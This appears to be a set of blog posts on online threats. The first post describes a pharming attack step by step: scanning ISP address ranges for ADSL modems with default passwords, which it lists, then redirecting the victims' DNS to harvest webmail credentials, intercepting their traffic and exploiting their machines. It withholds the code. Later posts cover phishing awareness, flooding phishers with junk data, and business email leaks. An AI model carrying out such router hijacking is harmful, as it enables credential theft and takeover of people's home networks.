Pharming exposed

While many people know and understand phishing, pharming as a threat doesn’t seem to have caught popular imagination. In this article, I attempt to show how ignorance, or maybe, simple oversight can lead to a complete compromise of your system, causing your system to be a part of a bot network remote controlled by an attacker.
There are many variants of pharming. Here , in this article, I demonstrate one that is very easy to pull off by a beginner to moderate level attacker.
The attack leverages the fact that most ADSL modems run an http server for configuration, which is not secured
Most of the time, a guy from the phone company comes and installs the ADSL modem, and the user is all set. What they dont tell you is that you need to change the default password on your ADSL modem immediately.To drive home my point, I thought it better to put on my bad guy hat, and get to work.Please note that no actual breakin was attempted on any of the systems, and that information is provided for educational purposes only.


Assumptions:
You know how to set up a DNS and a HTTP server, and have your computer on the internet ( You will need to DMZ your own system if you are behind a ADSL router, and open up your firewall )
You know how to set up a gateway and enable IP forwarding on it.

Step 1: Reconnaissance
The first step is of course a reconnaissance attempt to find potential victims. I run a quick check for the world visible IP address my router has. I am lazy , so I simply visit showmyip.com. It shows me xxx.xxx.191.16
Not surprisingly, I am in my isp's address block.I just take a small sample of 255 systems in my vicinity, whose IP would be in the range xxx.xxx.191.1 to xxx.xxx.191.255

Now I need to find out which all DSL modems in this range are systems with default password.

I know that my ISP uses Beetel ,DLink and Huawei modems , which generally have admin as id and passwords range from 1234, password, admin,utstar.So, I write a program ( uses libcurl) which spawns 30 threads and tries each IP in the range with the default id and password.A scan of the 255 addressess takes me 3 minutes and shows me 14 open DSL modems
.The systems with 200 as HTTP response code will accept the default id and password (See figure below )

Here is a screenshot of my system discovery code ( He he he, the actual code that does the recon is not shown )

Click to enlarge: Code screenshot

If you have a dedicated system and unlimited data transfer, you can probably run this whole day to scan thousands of IP addresses.

Step 2: Preparing for the attack:
Now I need to decide what I want to do with these open systems. There are just too many things one can do with this. The possibilities ...I will explain later. For now, lets just say I want to grab those user's email id and password. For this, I can set up my own DNS, and put in authoritative entries for gmail, hotmail,yahoo, whatever I fancy. For all other domains, I simply forward them to my ISP's DNS. This is how it will work.

Click to enlarge: normal steady state DSL in operation

Once I have set up my DNS, I also need to put up a webserver to server those pages.
So, two major cavaets here are ,
1. To setup a DNS server
2. To setup a webserver with a DataBase at the backend to grab the user id and passwords

Step 3: The attack:
Though this step can be completely automated with scripts, or C programs,I do this manually with one single system, just as a matter of example:
The schematic of a DNS hijacking attack is shown below

So I login to this person's DSL modem, and point his DNS to my DNS server .And would you believe it??Thats all I need to do to grab this persons internet.

Logging in to the victim's router


Altering the DNS address


So that was easy, you could harvest a ton of stuff this way. But this doesnt give you much.So additional stuff can I try??Ummm..why not intercept ALL his traffic ?How ??Thats easy...set up your system to be gateway and do an IP forwarding

But then I want his whole system. Not just the traffic.Umm..OK, put his system on the DMZ. That way he is out in the open. I let nmap take shot at identifying what OS he os running, pull out a bunch of exploits and throw at this system , and presto...I have his computer.

But what will I do with his computer ? Will think about that later

Identifying Phish

Today, I got a Mcafee link which apparently is a phish awareness testing quiz.So, off I went , took the quiz, got 7/10.Great. Now to the point: Somehow, I never expected a security company to offer lame ways of identifying Phish.
If I were to identify Phish, the easiest way is to just take a look at the address bar, and check the site (Yeah, the phisher can put an image on the address bar , but that is easy to figure out).Another precaution is beware of wrong SSL certificates. These 2 prime measures seem to have been conveniently ignored.
Just have a look:

This is the original aol phish page:



This is siteadvisor's explanation:


Bank of America Phish analysis offered by siteadvisor


Capital One Phish analysis


Its surprising how a security company promotes such crude means to identify phish.
The sad part is that these guys seem to imply that a site with correct grammar and graphics is NOT a Phish site.Imagine what such inference does to the grandma class of users. This is unfortunate.

PhishPhighting

Today, in one of the orkut ( a social networking site ) communities, I read a post on how a guy lost his gmail id on a phish site. He posted the phish url, and warned others to be aware.

True, other than try and steer clear of them ,there is little one can do for a phish attack.Surely, there are tons of advise on how to guard from phish.Whats more, security companies are making money out of identifying and flagging phish sites.

Now that makes me wonder...Is there no other go? Reminded me of the "dont get mad, get even" adage.Lets see how we can do that. Think...what does a phisher do with the information he gleans?He uses it ,of course. From reading other’s emails to emptying bank accounts, they do it all.

From a security perspective however, there is no such thing as foolproof security. Its just a matter of making it more difficult for the bad guy. So, in our attempt to get even with the phisher, that’s what we focus on. We try and make it difficult for him to use phished information. How?? We flood the phisher with junk data. Data that is trash, maybe randomly or dictionary generated. Once we flood the Phisher's database ( or whatever backend he is using) with trash, its like finding the proverbial needle in the haystack for the phish guy. Imagine having one valid victim credentials and ten thousand other garbage credentials.The only possible way for a phisher is to actually use the victim information to find out if its genuine.

Later in the article I demonstrate how such a thing maybe accomplished.

Surely, a more competent phisher will then possibly deploy countermeasures to such flooding.He may implement tracking , session or in extreme cases captchas in his phish site,.Maybe he will filter out the flooding IPs.We will probably think of a solution when they get there. Remember, I am talking about raising the bar. Not about eliminating the problem. Still, its not difficult to defeat such anti - antiphish countermeasures (Captchas would be an exception though)

Also, remember, I am not talking about protecting yourself from phishers, I am talking about making their life miserable enough to wean them away from it.

The inspiration for this comes from the hilarious 419eater.com

Now, as promised earlier lets look at how one may accomplish this.

Before I do that, there are some tools , libraries and utilities that I used, To name a few , Paros , libcurl , perl, gcc , linux…Wow…

The phish site:

Then I fire up my favorite : Paros

Then I set my browser to use this proxy

And then I get victimized

Here is what the phish request looks like:

After trying this with various permutations and combinations of systems and credentials, I found that other than the credentials, everything else remains the same everytime I get phished.This means , I am in luck. All I need to hose the phisher’s inbox is to keep sending him garbage post requests. Great. Now to some actual work.

Now there are many ways I can swamp this guy. I can do a quick and dirty command line ( ahh…isn’t curl great !!!), or , write my own C code using libcurl, or do a plain and simple perl script that uses libcurl binding.

I tried all three. But somehow, doesn’t seem to be a good idea to publish the code. I haven’t actually hosed the guy yet, I am in an ethical dilemma. Gunning down someone ,even if that person is a crook , is still a crime. Let me sleep over it

business emails on 3rd party webmail servers?

The other day, I heard about an individual whose company email account was not functioning. There had been some problems with her account. Instead of getting it fixed by contacting IT and helpdesk , she started using her personal email id on gmail for business communications. Important and confidential information regarding the product she works on , code snippets, developer discussions are all a part of google data centers now.
What bothers me is that this is not an one off isolated case. There are probably countless other instances where people are sending out sensitive business information over 3rd party public email severs.
It's probably a matter of time before someone comes up with a proposal for harvesting and profiting from sensitive data on email data centers.